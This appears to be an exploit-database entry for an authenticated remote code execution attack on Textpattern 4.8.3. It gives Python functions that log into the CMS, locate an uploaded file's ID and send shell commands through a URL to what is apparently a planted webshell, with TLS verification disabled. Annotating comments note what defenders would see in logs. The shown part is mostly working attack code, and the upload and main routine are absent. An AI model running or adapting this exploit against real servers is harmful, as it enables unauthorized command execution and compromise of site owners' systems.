Exploits / Vulnerability Discovered : 2021-03-04 |
Type : webapps |
Platform : php
This exploit / vulnerability, Textpattern 4.8.3 remote code execution (authenticated) (2), is for educational purposes only; if you use it, you do so at your own risk!
def get_file_id(s, files_url, file_name):
    """Return the id segment of the download link whose name is file_name.

    Fetches files_url through the session s, parses the returned HTML and
    inspects every anchor whose href contains "file_download/". The text
    after that marker is split on "/" into [id, name, ...]; the id is
    returned when the name segment equals file_name.

    NOTE(review): the listing lost its indentation. The return is assumed
    to sit inside the match branch, so the function yields None when no
    link matches. Confirm against the original file.
    """
    # verify=False turns off TLS certificate validation for this request,
    # so the identity of the remote host is not checked.
    r = s.get(files_url, verify=False)
    soup = BeautifulSoup(r.text, "html.parser")
    for a in soup.findAll('a'):
        # Presumably every anchor on the page carries an href; an anchor
        # without one would raise KeyError here. Verify against bs4.
        if "file_download/" in a['href']:
            # href shape assumed: .../file_download/<id>/<name>
            file_id_name = a['href'].split('file_download/')[1].split("/")
            # Indexing [1] requires at least one "/" after the id.
            if file_id_name[1] == file_name:
                file_id = file_id_name[0]
                return file_id
def login(login_url, user, password):
    """Open a session, submit the login form and return (session, token).

    A GET to login_url is issued first, followed by a POST carrying
    p_userid, p_password and an empty _txp_token. On HTTP 401 the function
    prints a message and terminates the process with exit status 0.
    Otherwise the response HTML is scanned for input elements named
    "_txp_token"; the value of the last such element is returned with the
    session (an empty string when none is present).

    For defenders: the GET-then-POST pair against login_url with these
    form field names is what this helper sends, and is what would show up
    in the server's request logs.
    """
    session = requests.Session()
    # verify=False disables TLS certificate validation on both requests,
    # so the credentials are sent without checking the server's identity.
    session.get(login_url, verify=False)
    form = {
        "p_userid": user,
        "p_password": password,
        "_txp_token": "",
    }
    reply = session.post(login_url, data=form, verify=False)

    # Only a 401 is treated as a failed login; any other status falls
    # through to token extraction.
    if str(reply.status_code) == "401":
        print("[+] Invalid credentials")
        sys.exit(0)

    page = BeautifulSoup(reply.text, "html.parser")
    token = ""
    for field in page.findAll('input'):
        # Subscript access is kept as in the original: an input without a
        # name attribute is not skipped silently.
        if field['name'] != "_txp_token":
            continue
        token = field['value']
    return session, token
def exec_cmd(s, cmd_url, command):
    """Request cmd_url + command and return the body minus the filler line.

    command is appended to cmd_url as-is (no URL encoding), the resulting
    URL is fetched with the session s, and every occurrence of the fixed
    "Lorem ipsum" anchor line is stripped from the response text.

    For defenders: because the command travels in the request URL, it is
    normally recorded verbatim in the web server's access log.
    """
    filler = "<a>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed eiusmod tempor incidunt ut labore et dolore magna aliqua.</a>\n"
    target = cmd_url + command
    # verify=False: TLS certificate validation is disabled for this call.
    reply = s.get(target, verify=False)
    return reply.text.replace(filler, "")